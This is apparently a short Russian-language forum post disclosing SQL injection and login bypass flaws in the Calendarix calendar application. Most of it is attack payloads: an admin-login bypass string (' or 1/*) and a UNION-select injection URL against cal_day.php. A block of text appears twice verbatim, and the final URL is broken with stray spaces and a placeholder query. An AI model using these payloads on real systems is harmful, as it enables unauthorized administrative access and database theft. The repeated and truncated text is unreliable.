Calendarix SQL Injection & Authorization Bypass Vulnerabilities
Хех, классика жанра. Неужели людей история не учит?
http://host/calendarix/admin/cal_login.php
username: ' or 1/*
password: any
Да и к тому же вот такая инъекция:
Хех, классика жанра. Неужели людей история не учит?
http://host/calendarix/admin/cal_login.php
username: ' or 1/*
password: any
Да и к тому же вот такая инъекция:
Код:
http://host/calendarix/cal_day.php? op=day&date=2006-01-10&catview=99% 20union%20select% blabla